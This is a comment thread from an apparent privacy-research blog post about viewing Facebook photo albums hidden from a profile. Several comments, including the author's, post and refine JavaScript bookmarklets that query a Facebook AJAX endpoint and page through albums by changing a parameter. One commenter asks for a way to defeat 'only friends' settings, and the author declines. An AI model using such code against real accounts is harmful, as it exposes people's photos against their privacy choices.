Comments on: Easily View Hidden Facebook Photo Albums http://theharmonyguy.com/2009/12/17/easily-view-hidden-facebook-photo-albums/ Investigating privacy and security issues in online social networking Thu, 09 Feb 2012 10:47:20 +0000 hourly 1 http://wordpress.org/?v= By: David http://theharmonyguy.com/2009/12/17/easily-view-hidden-facebook-photo-albums/comment-page-1/#comment-9683 David Mon, 15 Mar 2010 00:28:36 +0000 http://theharmonyguy.com/?p=598#comment-9683 Thanks for this brilliant post! I hope you get that new code working for the other pages. This code only seems to work if someones photo settings are set to ''friends of friends'' or something like that. So I was thinking, if this code is able to break through some of the facebook's privacy, wouldn't it be possible to create a code that could see all photos even if they're set to ''only friends''? I'm not familiar with javascript but i'm sure you can find a way!! Thanks for this brilliant post! I hope you get that new code working for the other pages.

This code only seems to work if someones photo settings are set to ”friends of friends” or something like that. So I was thinking, if this code is able to break through some of the facebook’s privacy, wouldn’t it be possible to create a code that could see all photos even if they’re set to ”only friends”?

I’m not familiar with javascript but i’m sure you can find a way!!

]]> By: anonim http://theharmonyguy.com/2009/12/17/easily-view-hidden-facebook-photo-albums/comment-page-1/#comment-9630 anonim Thu, 11 Mar 2010 18:12:11 +0000 http://theharmonyguy.com/?p=598#comment-9630 Anyway, thanks for the first trick. I'll step by and check if its been solved. I unfortunately can't help as this scripting is not something I'm good at. Anyway, thanks for the first trick. I’ll step by and check if its been solved. I unfortunately can’t help as this scripting is not something I’m good at.

]]> By: theharmonyguy http://theharmonyguy.com/2009/12/17/easily-view-hidden-facebook-photo-albums/comment-page-1/#comment-9621 theharmonyguy Thu, 11 Mar 2010 00:23:30 +0000 http://theharmonyguy.com/?p=598#comment-9621 @anonim Now that you mention it, I can't get my updated code to work either! I'm remembering now some of the issues I encountered when I first worked on this and why I didn't include a way to load the other pages... they definitely can be loaded, it'll just take a little more work for me to put it together in a nice bookmarklet. @anonim Now that you mention it, I can’t get my updated code to work either! I’m remembering now some of the issues I encountered when I first worked on this and why I didn’t include a way to load the other pages… they definitely can be loaded, it’ll just take a little more work for me to put it together in a nice bookmarklet.

]]> By: anonim http://theharmonyguy.com/2009/12/17/easily-view-hidden-facebook-photo-albums/comment-page-1/#comment-9620 anonim Thu, 11 Mar 2010 00:05:44 +0000 http://theharmonyguy.com/?p=598#comment-9620 Ok, works for one page, that is 5 albums. But those latest two codes do not work for me. Am I doing it right by clicking on "properties" of the bookmarked, then under "location" exchange the code with: javascript:(function(){function y(){if(x.readyState==4){q=x.responseText.substring(9);p=eval(‘(‘+q+’)');document.getElementById(‘tab_canvas’).innerHTML=p.payload.tab_content;}}x=window.XMLHttpRequest?new window.XMLHttpRequest:(window.ActiveXObject?new ActiveXObject(“MSXML2.XMLHTTP”):null);x.onreadystatechange=y;x.open(‘GET’,'http://www.facebook.com/ajax/profile/tab.php?id=’+ProfileURIController._profileId+’&v=photos&__a=1&sb=5′,true);x.send();})() I don't understand Java Script well. Ok, works for one page, that is 5 albums. But those latest two codes do not work for me. Am I doing it right by clicking on “properties” of the bookmarked, then under “location” exchange the code with:

javascript:(function(){function y(){if(x.readyState==4){q=x.responseText.substring(9);p=eval(‘(‘+q+’)’);document.getElementById(‘tab_canvas’).innerHTML=p.payload.tab_content;}}x=window.XMLHttpRequest?new window.XMLHttpRequest:(window.ActiveXObject?new ActiveXObject(“MSXML2.XMLHTTP”):null);x.onreadystatechange=y;x.open(‘GET’,’http://www.facebook.com/ajax/profile/tab.php?id=’+ProfileURIController._profileId+’&v=photos&__a=1&sb=5′,true);x.send();})()

I don’t understand Java Script well.

]]> By: theharmonyguy http://theharmonyguy.com/2009/12/17/easily-view-hidden-facebook-photo-albums/comment-page-1/#comment-9609 theharmonyguy Tue, 09 Mar 2010 23:55:46 +0000 http://theharmonyguy.com/?p=598#comment-9609 @FacebookHater: I'm not sure why I didn't think to adapt this bookmarklet with a GET request, as I'd previously discussed the "sb" parameter... I think I may have had some trouble getting to work previously, but oh well. Excellent tip, but in my testing the JS still needs a bit more adaptation, like so: javascript:(function(){function y(){if(x.readyState==4){q=x.responseText.substring(9);p=eval('('+q+')');document.getElementById('tab_canvas').innerHTML=p.payload.tab_content;}}x=window.XMLHttpRequest?new window.XMLHttpRequest:(window.ActiveXObject?new ActiveXObject("MSXML2.XMLHTTP"):null);x.onreadystatechange=y;x.open('GET','http://www.facebook.com/ajax/profile/tab.php?id='+ProfileURIController._profileId+'&v=photos&__a=1&sb=5',true);x.send();})() That one worked for me, and obviously one would simply increment the "sb" value for more albums. @Tom: You need to right-click the link to bookmark it. @ScorpionSX: If I had a way to override Facebook's privacy settings, I wouldn't simply publish it on my blog. :) @FacebookHater: I’m not sure why I didn’t think to adapt this bookmarklet with a GET request, as I’d previously discussed the “sb” parameter… I think I may have had some trouble getting to work previously, but oh well. Excellent tip, but in my testing the JS still needs a bit more adaptation, like so:

javascript:(function(){function y(){if(x.readyState==4){q=x.responseText.substring(9);p=eval(‘(‘+q+’)');document.getElementById(‘tab_canvas’).innerHTML=p.payload.tab_content;}}x=window.XMLHttpRequest?new window.XMLHttpRequest:(window.ActiveXObject?new ActiveXObject(“MSXML2.XMLHTTP”):null);x.onreadystatechange=y;x.open(‘GET’,’http://www.facebook.com/ajax/profile/tab.php?id='+ProfileURIController._profileId+'&v=photos&__a=1&sb=5',true);x.send();})()

That one worked for me, and obviously one would simply increment the “sb” value for more albums.

@Tom: You need to right-click the link to bookmark it.

@ScorpionSX: If I had a way to override Facebook’s privacy settings, I wouldn’t simply publish it on my blog. :)

]]> By: FacebookHater http://theharmonyguy.com/2009/12/17/easily-view-hidden-facebook-photo-albums/comment-page-1/#comment-9588 FacebookHater Sun, 07 Mar 2010 12:30:22 +0000 http://theharmonyguy.com/?p=598#comment-9588 @harmonyguy: It's easy to get the following pages of galleries. You just add the sb=... parameter. What is important is that it has to be submitted via GET not POST. In other words you have to adjust the JS for it. For the second page it would look like javascript:(function(){function y(){if(x.readyState==4){q=x.responseText.substring(9);p=eval(‘(‘+q+’)');document.getElementById(‘tab_canvas’).innerHTML=p.payload.tab_content;}}x=window.XMLHttpRequest?new window.XMLHttpRequest:(window.ActiveXObject?new ActiveXObject(“MSXML2.XMLHTTP”):null);x.onreadystatechange=y;x.open(‘POST’,'http://www.facebook.com/ajax/profile/tab.php?sb=5’,true);x.send(‘id=’+ProfileURIController._profileId+’&v=photos&__a=1′);})() @harmonyguy: It’s easy to get the following pages of galleries. You just add the sb=… parameter. What is important is that it has to be submitted via GET not POST. In other words you have to adjust the JS for it. For the second page it would look like

javascript:(function(){function y(){if(x.readyState==4){q=x.responseText.substring(9);p=eval(‘(‘+q+’)’);document.getElementById(‘tab_canvas’).innerHTML=p.payload.tab_content;}}x=window.XMLHttpRequest?new window.XMLHttpRequest:(window.ActiveXObject?new ActiveXObject(“MSXML2.XMLHTTP”):null);x.onreadystatechange=y;x.open(‘POST’,’http://www.facebook.com/ajax/profile/tab.php?sb=5’,true);x.send(‘id=’+ProfileURIController._profileId+’&v=photos&__a=1′);})()

]]> By: me http://theharmonyguy.com/2009/12/17/easily-view-hidden-facebook-photo-albums/comment-page-1/#comment-9518 me Fri, 26 Feb 2010 05:26:17 +0000 http://theharmonyguy.com/?p=598#comment-9518 Does it only allow to see the first 3 ? Does it only allow to see the first 3 ?

]]> By: Hack foto pubbliche nei profili Facebook | Nicola Moretti - Hanicker IT Blog http://theharmonyguy.com/2009/12/17/easily-view-hidden-facebook-photo-albums/comment-page-1/#comment-8896 Hack foto pubbliche nei profili Facebook | Nicola Moretti - Hanicker IT Blog Fri, 29 Jan 2010 21:18:06 +0000 http://theharmonyguy.com/?p=598#comment-8896 [...] Tratto da: theharmonyguy.com [...] [...] Tratto da: theharmonyguy.com [...]

]]> By: Tom http://theharmonyguy.com/2009/12/17/easily-view-hidden-facebook-photo-albums/comment-page-1/#comment-8569 Tom Tue, 19 Jan 2010 03:56:43 +0000 http://theharmonyguy.com/?p=598#comment-8569 how do u bookmark the link? when I click on it nothnig hapapens how do u bookmark the link? when I click on it nothnig hapapens

]]> By: Polyster http://theharmonyguy.com/2009/12/17/easily-view-hidden-facebook-photo-albums/comment-page-1/#comment-8497 Polyster Sat, 16 Jan 2010 16:37:24 +0000 http://theharmonyguy.com/?p=598#comment-8497 It works! thanks man! It works! thanks man!

]]>